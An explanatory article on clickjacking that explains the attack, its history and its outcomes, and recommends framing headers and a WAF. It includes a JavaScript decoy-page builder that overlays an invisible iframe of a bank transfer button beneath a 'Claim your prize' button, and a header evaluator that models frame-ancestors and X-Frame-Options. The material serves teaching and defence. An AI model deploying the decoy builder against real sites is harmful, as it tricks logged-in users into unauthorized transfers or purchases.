Think back to when you first learned to use a computer mouse: almost everyone has clicked the wrong icon by accident. Even today, particularly when user interface elements are small or cluttered, it is easy to select the wrong item with the pointer.
Fortunately, most of the time this causes no problems. If you click the wrong hyperlink on a website, you may land on a different page from the one you expected, but a quick tap of the "back" button returns you to the previous page. No harm, no foul.
But imagine if clicking the wrong element carried a real cost, such as a money transfer being initiated because you clicked in the wrong place.
No legitimate developer would build software that behaves this way, but attackers are a different matter. Through a form of attack known as click hijacking, or "clickjacking," they use misplaced clicks to make the victim's browser perform damaging actions on the victim's behalf, ranging from unauthorized transfers of funds and unwanted product purchases to microphone or webcam activation and credential theft.
Worse, such attacks don't even give users a fair chance to avoid the wrong link: the attacker's page embeds the target website in an invisible frame (an iframe rendered fully transparent) laid over decoy content, so a user who thinks they are clicking a harmless button is actually clicking a real control on the framed site, to which they are already logged in. Because the click is genuine and carries the victim's session cookies, the target site has no reason to refuse it; the browser will only refuse to render the frame if the target site tells it to through its response headers. Attacks like this are yet another reason organizations should incorporate security measures such as a Web Application Firewall (WAF) into their cyber security solutions.
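The attacker side of this, as an added example that is not code from the original article: a small script that works out where to place the invisible frame so that the target site's real button sits exactly under a decoy button, checks that a click on the decoy really lands on it, and generates the decoy page. The target URL bank.example, the button coordinates and the decoy wording are constructed values; an attacker would measure the real button's position once in a browser.

```javascript
// Added example, not from the original article: how an attacker's decoy page
// positions an invisible frame so that the real control of a target site ends
// up directly under a harmless-looking button. All coordinates, the target URL
// (bank.example) and the decoy text are constructed for illustration.

// Position of the real control inside the framed target page, in pixels from
// the top-left corner of the frame (measured once by the attacker).
const TARGET_BUTTON = { x: 412, y: 530, w: 160, h: 44 }; // e.g. "Confirm transfer"

// Position of the decoy control on the attacker's own page, in viewport pixels.
const DECOY_BUTTON = { x: 300, y: 200, w: 160, h: 44 }; // e.g. "Claim your prize"

// Offset that places the frame so that the target control lands on the decoy.
function frameOffset(target, decoy) {
  return { left: decoy.x - target.x, top: decoy.y - target.y };
}

// Translate a click at viewport position (cx, cy) into the frame's own
// coordinates and report whether it falls on the target control.
function clickHitsTarget(cx, cy, target, decoy) {
  const off = frameOffset(target, decoy);
  const fx = cx - off.left;
  const fy = cy - off.top;
  return fx >= target.x && fx < target.x + target.w &&
         fy >= target.y && fy < target.y + target.h;
}

// Sanity check an attacker would run: the centre of the decoy must map onto
// the target control.
function decoyIsAligned(target, decoy) {
  return clickHitsTarget(decoy.x + decoy.w / 2, decoy.y + decoy.h / 2, target, decoy);
}

// The decoy page. The frame is stacked above the decoy (higher z-index) and
// rendered with opacity:0, which, unlike visibility:hidden or display:none,
// still receives pointer events. reveal=true makes the frame half-visible,
// which is useful when demonstrating the problem to developers.
function buildDecoyPage(targetUrl, target, decoy, reveal = false) {
  const off = frameOffset(target, decoy);
  const frameOpacity = reveal ? 0.5 : 0;
  return [
    "<!doctype html>",
    "<html><body>",
    "<p>Congratulations! Click below to claim your prize.</p>",
    `<button style="position:absolute;left:${decoy.x}px;top:${decoy.y}px;` +
      `width:${decoy.w}px;height:${decoy.h}px;z-index:1">Claim your prize</button>`,
    `<iframe src="${targetUrl}" scrolling="no" style="position:absolute;` +
      `left:${off.left}px;top:${off.top}px;width:1280px;height:1024px;` +
      `border:0;opacity:${frameOpacity};z-index:2"></iframe>`,
    "</body></html>",
  ].join("\n");
}
```

Writing the output of `buildDecoyPage("https://bank.example/transfer", TARGET_BUTTON, DECOY_BUTTON, true)` to a file and opening it shows the half-visible frame sitting over the decoy; with `reveal` left at its default the frame is invisible and the decoy looks like an ordinary page. If the target site sends framing controls, the browser refuses to render the frame at all and the decoy button does nothing.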
Clickjacking rears its ugly head
The underlying trick was noticed in the early 2000s, when it was found that a transparent layer could be loaded over a webpage and clicked without the user being aware that anything was amiss. It was several more years, however, before the technique was given the name "clickjacking" (the term was coined in 2008 by Jeremiah Grossman and Robert Hansen) and the scale of the problem it posed became widely understood.
Another term for this type of attack is "UI redressing" (UI being short for user interface), since the attack works by disguising or covering interface elements so that the victim clicks them unknowingly.
Clickjacking attacks satisfy two criteria that make an attack effective. First, they can cause serious damage, because the actions are performed by the victim's own authenticated browser session and look legitimate to the target site. Second, they evade detection while they happen: the framed page is invisible, so victims are unlikely to realize what has occurred until the consequences of the clickjacked action become apparent.
Variations of clickjacking
Because a clickjacking attack can trigger almost any action the victim is entitled to perform on the framed site, there are many variations. Common outcomes include:
- Causing the user to download malware
- Theft of the user's login credentials for different websites or services
- Causing the user to make unauthorized transfers of money
- Causing the user to make unsolicited purchases of products
- Sharing the user's location without their knowledge or express permission
- Causing the user to unknowingly "like" or share a post on social media platforms, thereby helping to spread it online
- Causing the user's microphone or webcam to be enabled for the attacker (the original 2008 demonstration used the Adobe Flash Player settings dialog for exactly this)
Not only could this have an obvious detrimental impact on users; it could also, for understandable reasons, be very damaging to the reputation of the organization whose webpage was framed, even though that organization did nothing but fail to forbid framing. This reputational damage could lose customers and, in some cases, result in financial penalties.
The shifting cyber security landscape
In all, clickjacking is yet another example of the shifting cyber security landscape today. To stay protected, organizations should make use of the full arsenal of cyber security tools on offer to keep themselves and their users safe.
One important tool is a Web Application Firewall (WAF), which inspects traffic to web applications and can block many attacks, including those designed to steal sensitive data. Against clickjacking specifically, the decisive control is to tell browsers which origins may frame a page, using a Content-Security-Policy header with a frame-ancestors directive and, for older browsers, an X-Frame-Options header. A WAF or reverse proxy is a convenient place to add those headers consistently to every application it fronts, including legacy ones that cannot easily be changed, and to check that nothing behind it strips them again. It is a smart investment for any organization looking to protect itself from the worst that cyber attackers have to throw at it.
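As an added example of what those headers actually do (this is not code from the original article, and not any WAF product's logic), here is a JavaScript function that decides, the way a browser does, whether a response may be rendered inside a frame by a given chain of ancestor origins. It handles the frame-ancestors directive, which overrides X-Frame-Options whenever an enforced policy carries it, and X-Frame-Options itself, including its conflicting-value and obsolete ALLOW-FROM cases. The origins bank.example, partner.example and attacker.example and the two header sets are constructed; the "hardened" set is what a reverse proxy or WAF in front of the application would add. Path parts of frame-ancestors sources are ignored here.

```javascript
// Added example, not from the original article: decide whether a response may
// be rendered inside a frame by a chain of ancestor pages, following the
// processing model browsers apply to Content-Security-Policy frame-ancestors
// and X-Frame-Options. Origins and header sets below are constructed.

const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Split an origin or URL into the parts that matter for framing decisions.
function parseOrigin(urlString) {
  const u = new URL(urlString);
  return { scheme: u.protocol, host: u.hostname.toLowerCase(), port: u.port || DEFAULT_PORTS[u.protocol] || "" };
}

// CSP "scheme-part" matching: an http source also covers https ancestors.
function schemeMatches(source, actual) {
  return source === actual || (source === "http:" && actual === "https:") || (source === "ws:" && actual === "wss:");
}

// Does one frame-ancestors source expression cover the given ancestor origin?
function sourceMatches(rawSource, ancestor, self) {
  const src = rawSource.toLowerCase();
  if (src === "'none'") return false;
  if (src === "*") return true;
  if (src === "'self'") return ancestor.scheme === self.scheme && ancestor.host === self.host && ancestor.port === self.port;
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return schemeMatches(src, ancestor.scheme); // scheme-source, e.g. "https:"
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*|(?:\*\.)?[^/:]+)(?::(\*|\d+))?(?:\/.*)?$/.exec(src);
  if (!m) return false;
  const [, scheme, host, port] = m;
  // Without an explicit scheme the source inherits the protected page's scheme.
  if (!schemeMatches(scheme ? scheme + ":" : self.scheme, ancestor.scheme)) return false;
  if (host.startsWith("*.")) {
    if (!ancestor.host.endsWith(host.slice(1))) return false; // subdomains only, not the apex itself
  } else if (host !== "*" && host !== ancestor.host) {
    return false;
  }
  if (port === "*") return true;
  if (port) return port === ancestor.port;
  return ancestor.port === (DEFAULT_PORTS[ancestor.scheme] || ""); // no port given: default port only
}

// Source list of the first frame-ancestors directive in a policy, or null.
function frameAncestorsSources(policy) {
  for (const directive of policy.split(";")) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === "frame-ancestors") return tokens.slice(1);
  }
  return null;
}

// headers: header names mapped to arrays of values (a response may carry several
// Content-Security-Policy headers and every one of them must allow the frame).
// ancestorOrigins: every page between the framed document and the top window.
function framingAllowed(headers, responseUrl, ancestorOrigins) {
  const self = parseOrigin(responseUrl);
  const ancestors = ancestorOrigins.map(parseOrigin);
  const get = (name) => headers[name] || headers[name.toLowerCase()] || [];

  // 1. An enforced frame-ancestors directive decides on its own; once one is
  //    present, X-Frame-Options is ignored. Report-Only policies never block.
  let sawFrameAncestors = false;
  for (const policy of get("Content-Security-Policy")) {
    const sources = frameAncestorsSources(policy);
    if (sources === null) continue;
    sawFrameAncestors = true;
    for (const ancestor of ancestors) {
      if (!sources.some((s) => sourceMatches(s, ancestor, self))) return false;
    }
  }
  if (sawFrameAncestors) return true;

  // 2. Fall back to X-Frame-Options.
  const values = get("X-Frame-Options").flatMap((v) => v.split(",")).map((v) => v.trim().toLowerCase()).filter(Boolean);
  const unique = new Set(values);
  if (unique.size === 0) return true; // no framing control at all: clickjackable
  if (unique.size > 1) return !["deny", "sameorigin", "allowall"].some((k) => unique.has(k)); // conflicting values
  const [only] = unique;
  if (only === "deny") return false;
  if (only === "sameorigin") return ancestors.every((a) => a.scheme === self.scheme && a.host === self.host && a.port === self.port);
  return true; // ALLOW-FROM and unknown tokens are ignored by current browsers
}

// Constructed header sets: the response as the application sends it, and the
// same response after a reverse proxy or WAF in front of it adds framing controls.
const TARGET = "https://bank.example/transfer";
const VULNERABLE_HEADERS = { "Content-Type": ["text/html"] };
const HARDENED_HEADERS = {
  "Content-Type": ["text/html"],
  "Content-Security-Policy": ["frame-ancestors 'self' https://*.partner.example"],
  "X-Frame-Options": ["SAMEORIGIN"], // fallback for browsers without frame-ancestors support
};

function evaluateExamples() {
  const attacker = ["https://attacker.example"];
  return {
    vulnerable: framingAllowed(VULNERABLE_HEADERS, TARGET, attacker),
    hardenedAttacker: framingAllowed(HARDENED_HEADERS, TARGET, attacker),
    hardenedSelf: framingAllowed(HARDENED_HEADERS, TARGET, ["https://bank.example"]),
    hardenedPartner: framingAllowed(HARDENED_HEADERS, TARGET, ["https://app.partner.example"]),
    // A partner page framed inside the attacker's page: every ancestor must be allowed.
    hardenedNested: framingAllowed(HARDENED_HEADERS, TARGET, ["https://app.partner.example", "https://attacker.example"]),
  };
}
```

`evaluateExamples()` returns `true` only for the vulnerable response and for the two origins the hardened policy names. Two details worth checking in a real deployment: a `Content-Security-Policy-Report-Only` header with `frame-ancestors 'none'` still leaves the page frameable, and an over-broad `frame-ancestors` source list overrides an `X-Frame-Options: DENY` sent alongside it, so adding the newer header can silently loosen an older one.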